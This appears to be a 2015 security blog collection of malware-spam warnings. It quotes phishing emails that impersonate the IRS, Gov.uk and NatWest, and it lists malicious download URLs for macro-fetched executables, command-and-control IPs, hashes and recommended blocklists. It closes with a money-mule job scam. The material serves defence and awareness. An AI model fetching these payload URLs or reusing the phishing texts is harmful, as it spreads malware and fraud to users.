If you have received this email and you are not the intended recipient or the employee or agent responsible for delivering this email to the intended recipient, please inform Mick George on +44 (0)1480 498099 and then delete the email from your system. If you are not a named addressee you must not use, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should scan this email and any attachments for viruses. Mick George Ltd makes no representation or warranty as to the absence of viruses in this email or any attachments. Please note for the protection of our clients and business, we may monitor and read emails sent to and from our server(s).
Mick George Ltd
Registered no. 2417831 (England)

The email looks like a genuine email because it has been copied from a genuine email from this company, but Mick George Skips are not actually sending this out. Instead it is a simple forgery.

What you are meant to have attached is a Word document Invoice395687.DOC which comes in several varieties, but they all contain a malicious macro similar to this which (in this case) downloads a component from http://schlaghaufer.de/js/bin.exe

This malware and the payload it drops is identical to the one found in this fake IRS spam run earlier today.

Malware spam: "Your 2015 Electronic IP Pin!" / "Internal Revenue Service [refund.noreply@irs.gov]"

This fake IRS email comes with a malicious attachment.

From:    Internal Revenue Service [refund.noreply@irs.gov]
Date:    6 March 2015 at 08:48
Subject:    Your 2015 Electronic IP Pin!

Dear Member

This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.

Please kindly download the microsoft file to securely review it.

Thanks

Internal Revenue Service
915 Second Avenue, MS W180

So far I have only seen a single sample of this with an attachment TaxReport(IP_PIN).doc - although there are usually several different versions. Currently this is undetected by AV vendors. This contains a malicious macro [pastebin] which downloads a component from the following location:

http://chihoiphunumos.ru/js/bin.exe

There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55. Automated analysis tools [1] [2] show attempted connections to:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)

According to the Malwr report this executable drops another version of itself [VT 1/56] and a malicious DLL [VT 2/56].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103

Malware spam: "Your online Gateway.gov.uk Submission"

This fake Government spam leads to malware.

From:    Gateway.gov.uk
Date:    6 March 2015 at 11:49
Subject:    Your online Gateway.gov.uk Submission

Government Gateway logo

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window

The best place to find government services and information

The link in the email leads to a download at cubbyusercontent.com and the payload is the same as this NatWest spam run also active today.

Malware spam: "You have received a new secure message from BankLine" / "Bankline [secure.message@business.natwest.com]"

This fake banking spam leads to malware.

From:    Bankline [secure.message@business.natwest.com]
Date:    6 March 2015 at 10:36
Subject:    You have received a new secure message from BankLine

You have received a secure message.

Your Documents have been uploaded to Cubby cloud storage.
Cubby cloud storage  is a cloud data service powered by LogMeIn, Inc.

Read your secure message by following the link bellow:

https://www.cubbyusercontent.com/pl/Business%20Secure%20Message.zip/_90ad04a3965340b195b8be98c6a6ae37


----------------
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.

If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 8719.

First time users - will need to register after opening the attachment.
About Email Encryption - https://help.business.natwest.com/support/app/answers/detail/a_id/1671/kw/secure%20message 

This downloads a ZIP file from cubbyusercontent.com which contains a malicious executable Business Secure Message.exe which has a VirusTotal detection rate of just 1/57.

Automated analysis tools [1] [2] [3] [4] show attempted connections to the following URLs:

http://all-about-weightloss.org/wp-includes/images/vikun.png
http://bestcoveragefoundation.com/wp-includes/images/vikun.png
http://190.111.9.129:14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http://190.111.9.129:14249/0603no11/HOME/41/7/4/

It also appears that there is an attempted connection to 212.56.214.203.

Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to block. It is also a characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns.org to work out the IP address of the infected machine, it is worth checking for traffic to this domain.

The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57.

Malware spam: "Credit Control [cc@pentafoods.com]"/ "Penta invoice I0026098"

This spam email does not come from Penta Foods, instead it is a simple forgery with a malicious attachment.

From:    Credit Control [cc@pentafoods.com]
Date:    5 March 2015 at 11:10
Subject:    Penta invoice I0026098

Please find attached your invoice I0026098

Regards,

Finance Team

Attached is a document I0026098.doc which comes in at least two versions with low detection rates [1] [2] which contain some macros [1] [2] that attempt to download a component from the following locations:

http://maloja.se/js/bin.exe
http://campusnut.com/js/bin.exe

This is the same payload as used in this earlier spam run. It currently has a VirusTotal detection rate of 12/56.

Malware spam: "Bobby Drell [rob@abbottpainting.com]" / "Brochure2.doc"

This spam does not come from Bobby Drell or Abbott Painting, instead it is a simple forgery with a malicious attachment.

From:    Bobby Drell [rob@abbottpainting.com]
Date:    5 March 2015 at 10:27
Subject:    Brochure2.doc

Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell

Attached is a file Brochure2.doc which has a low detection rate which contains this malicious macro [pastebin] which downloads a component from the following location:

http://data.gmsllp.com/js/bin.exe

This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.

Automated analysis tools [1] [2] show it phoning home to the following IPs:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)

Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24

"Remittance advice" spam has a mystery XML attachment

I haven't worked this out yet, but this appears to be a malware spam run using an XML document that contains an ActiveX element.

From:    Trudy Trevino
Date:    4 March 2015 at 09:29
Subject:    Remittance advice [Rem_0559ZX.xml]

Good morning

You can find remittance advice [Rem_0559ZX.xml] in the attachment

Kind Regards
Trudy Trevino
ROSNEFT OJSC

Other example fake senders are:

Georgette Whitfield
DELTEX MEDICAL GROUP

Jasmine Hansen
ACER INC

Jodi Cooper
JOHNSON SERVICE GROUP PLC

Rebekah Dodson
VICTREX

Edmund Molina
600 GROUP

Callie Brewer
BIOQUELL

Harriett Ferguson
BRISTOL & WEST PLC

Gabrielle Alvarado
JPMORGAN US SMALLER CO INV TST PLC

The name of the XML file in the attachment (and also the body text and subject) varies but is always in the format Rem_1234AB.xml. So far I have seen three different versions (clicking the MD5 leads to a Pastebin with the XML attachment):

• MD5 B2E594BDE90A1C998F3A7D892BAC925B - VT 0/57
• MD5 77739AB6C20E9DFBEFFA3E2E6960E156   - VT 0/57
• MD5 877E6EC17F307C319E3084D1EDFC40A4  - VT 0/57

The XML attachment contains a Base 64 encoded section which starts with the string "ActiveMime" which indicates that it is some sort of ActiveX element. I haven't been able to deduce the purpose of this, and the Malwr report is inconclusive but does show a command prompt being opened. The payload is most likely the Dridex banking given the other characteristics of the spam.

There's probably little reason to accept XML documents by email. Blocking these at your email gateway might be a good idea.

UPDATE 1

An analysis from another party indicates the following download locations:

http://92.63.87.12:8080/azvxjdfr31k/abs5ajsu.exe
http://178.32.184.11:8080/azvxjdfr31k/abs5ajsu.exe
http://46.30.42.90:8080/azvxjdfr31k/abs5ajsu.exe

The following are the servers the malware phones home to, I recommend blocking them:

62.76.176.203
46.30.42.171
74.208.68.243
37.139.47.111

More analysis to follow..

Malware spam: "John Donald [john@kingfishermanagement.uk.com]" / "Document1"

This rather terse email comes with a malicious attachment:

From:    John Donald [john@kingfishermanagement.uk.com]
Date:    4 March 2015 at 09:09
Subject:    Document1

There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors, in turn it contains this malicious macro [pastebin] which downloads another component from the following location:

http://retro-moto.cba.pl/js/bin.exe

Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.

Automated analysis tools [1] [2] show attempted network traffic to the following IPs:

92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithunia)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)

According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33

Fake job offer: "ukhomejob.com" and many others

This spam email for a fake (and illegal) job is soliciting replies to ukhomejob.com. It is part of a nework of fraudulent domains, attempting to recruit victims into money laundering and other illegal activities.

From:    Victim
To:    Victim
Date:    1 March 2015 at 22:09
Subject:    Advice

Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.

We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.

Part-time employment is currently important.
We offer a wage from 3500 GBP per month.

If you are interested in our offer, mail to us your answer on hermie@ukhomejob.com and
we will send you an extensive information as soon as possible.
Respectively submitted

Personnel department

This is related to this scam. Now though the IP used to receive emails is a Comcast IP of 98.221.25.74. The following domains are also related and are all fraudulent:

globbalpresence.com
recognizettrauma.net
gbearn.com
comercioes.com
eurohomejob.com
fastestrades.com
usaearns.com
idhomejob.com
ukhomejob.com
eurhomejob.com

The most likely "job" is money laundering, typically moving money out of stolen bank accounts and then passing on to someone in Eastern Europe. This activity is illegal, and there is a chance that you'll end up in jail at worst, or having to repay back the stolen money at best. Avoid.